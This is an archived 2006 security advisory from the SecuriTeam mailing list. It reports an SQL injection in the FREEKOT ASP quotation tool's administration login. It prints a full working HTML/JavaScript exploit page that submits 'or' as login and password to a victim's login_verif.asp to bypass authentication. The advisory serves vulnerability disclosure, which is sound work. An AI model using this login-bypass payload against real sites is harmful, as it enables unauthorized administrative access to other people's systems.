Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[UNIX] FREEKOT SQL Injection

Subject: [UNIX] FREEKOT SQL Injection
Date: 31 Aug 2006 17:01:59 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  FREEKOT SQL Injection
------------------------------------------------------------------------


SUMMARY

 <http://www.digiappz.com/> FREEKOT is "a free tool written in ASP which 
allows you to insert a random quotation system or a quote of the day in 
your website". A vulnerability in FREEKOT allows remote attackers to cause 
the product to insert arbitrary SQL into its existing SQL statements.

DETAILS

Input passed to the "login" and "password" parameters when logging into 
the administration section isn't properly sanitised before being used in a 
SQL query. This can be exploited to manipulate SQL queries by injecting 
arbitrary SQL code.

Exploit:
<html>
<head><title>KAPDA :: Freekot SQL-Injection Vulnerability , Login bypass 
exploit </title></head>
<body bgcolor="black">
<script language="JavaScript">
function egxpl() {
  if (document.xplt.victim.value=="") {
    alert("Please enter victim site!");
    return false;
  }
  if (confirm("Are you sure?")) {
    xplt.action=document.xplt.victim.value+"/login_verif.asp";
    xplt.login.value=document.xplt.login.value;
    xplt.password.value=document.xplt.password.value;
    xplt.submit();
  }
}
</script><font face=Verdana size=2 color="#00FF00"><center><b>KAPDA :: 
Freekot SQL-Injection Vulnerability<br>
Discovered and coded by FarhadKey From KAPDA.IR<br>
Special Thx to Hessam-x From Anti-Security.net (Hackerz.ir)<br></b>
<form name="xplt" method="post" onsubmit="egxpl();">
<br>Victim Path : (insert http:// for path)<br>
<input type="text" name="victim" 
value="http://www.victim.com/FreeKot_Path/"; size="44" class="xpl" 
style="color: #00FF00; background-color: #000000"><br>
<input type="hidden" name="login" value="'or'">
<input type="hidden" name="password" value="'or'"><br>
<!-- Discovered and coded by FarhadKey . Kapda.ir -->
<input type="submit" value="GO !!!" style="color: #00FF00; 
background-color: #000000">
</form></body></html>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:farhadkey@kapda.ir> 
FarhadKey of KAPD.
The original article can be found at:  
<http://www.kapda.ir/advisory-410.html> 
http://www.kapda.ir/advisory-410.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] FREEKOT SQL Injection, SecuriTeam <=